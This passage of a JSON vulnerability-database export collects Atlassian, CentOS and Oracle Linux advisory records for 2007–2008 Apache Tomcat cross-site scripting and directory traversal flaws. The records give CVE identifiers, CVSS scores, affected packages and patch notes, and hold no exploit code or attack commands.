["CVE-2007-3382", "CVE-2008-2938", "CVE-2008-2370", "CVE-2007-3385"], "modified": "2017-02-17T05:10:26", "id": "ATLASSIAN:CONFSERVER-10445", "href": "https://jira.atlassian.com/browse/CONFSERVER-10445", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T18:52:12", "description": "We should bundle the latest version of Tomcat with standalone to pick up some fixes including the security vulnerability detailed at:\r\n\r\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382\r\n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385", "cvss3": {}, "published": "2008-01-15T04:23:59", "type": "atlassian", "title": "Upgrade standalone Tomcat to 5.5.25", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3382", "CVE-2008-2938", "CVE-2008-2370", "CVE-2007-3385"], "modified": "2017-02-17T05:10:26", "id": "ATLASSIAN:CONF-10445", "href": "https://jira.atlassian.com/browse/CONF-10445", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2023-01-01T04:53:32", "description": "**CentOS Errata and Security Advisory** CESA-2008:0648\n\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nA cross-site scripting vulnerability was discovered in the\nHttpServletResponse.sendError() method. A remote attacker could inject\narbitrary web script or HTML via forged HTTP headers. (CVE-2008-1232)\n\nAn additional cross-site scripting vulnerability was discovered in the host\nmanager application. A remote attacker could inject arbitrary web script or\nHTML via the hostname parameter. (CVE-2008-1947)\n\nA traversal vulnerability was discovered when using a RequestDispatcher\nin combination with a servlet or JSP. A remote attacker could utilize a\nspecially-crafted request parameter to access protected web resources.\n(CVE-2008-2370)\n\nAn additional traversal vulnerability was discovered when the\n\"allowLinking\" and \"URIencoding\" settings were activated. A remote attacker\ncould use a UTF-8-encoded request to extend their privileges and obtain\nlocal files accessible to the Tomcat process. (CVE-2008-2938)\n\nUsers of tomcat should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2008-August/064692.html\nhttps://lists.centos.org/pipermail/centos-announce/2008-August/064693.html\n\n**Affected packages:**\ntomcat5\ntomcat5-admin-webapps\ntomcat5-common-lib\ntomcat5-jasper\ntomcat5-jasper-javadoc\ntomcat5-jsp-2.0-api\ntomcat5-jsp-2.0-api-javadoc\ntomcat5-server-lib\ntomcat5-servlet-2.4-api\ntomcat5-servlet-2.4-api-javadoc\ntomcat5-webapps\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2008:0648", "cvss3": {}, "published": "2008-08-28T22:01:41", "type": "centos", "title": "tomcat5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1232", "CVE-2008-1947", "CVE-2008-2370", "CVE-2008-2938"], "modified": "2008-08-28T22:01:41", "id": "CESA-2008:0648", "href": "https://lists.centos.org/pipermail/centos-announce/2008-August/064692.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:20", "description": "[5.5.23-0jpp.7.el5_2.1]\n- add patch for CVE-2008-1232\n Resolves: rhbz#457727\n- add patch for CVE-2008-1947\n Resolves: rhbz#449916\n- add patch for CVE-2008-2370\n Resolves: rhbz#458634\n- add patch for CVE-2008-2938\n Resolves: rhbz#456214", "cvss3": {}, "published": "2008-08-27T00:00:00", "type": "oraclelinux", "title": "tomcat security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2008-1947", "CVE-2008-2938", "CVE-2008-2370", "CVE-2008-1232"], "modified": "2008-08-27T00:00:00", "id": "ELSA-2008-0648", "href": "http://linux.oracle.com/errata/ELSA-2008-0648.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability
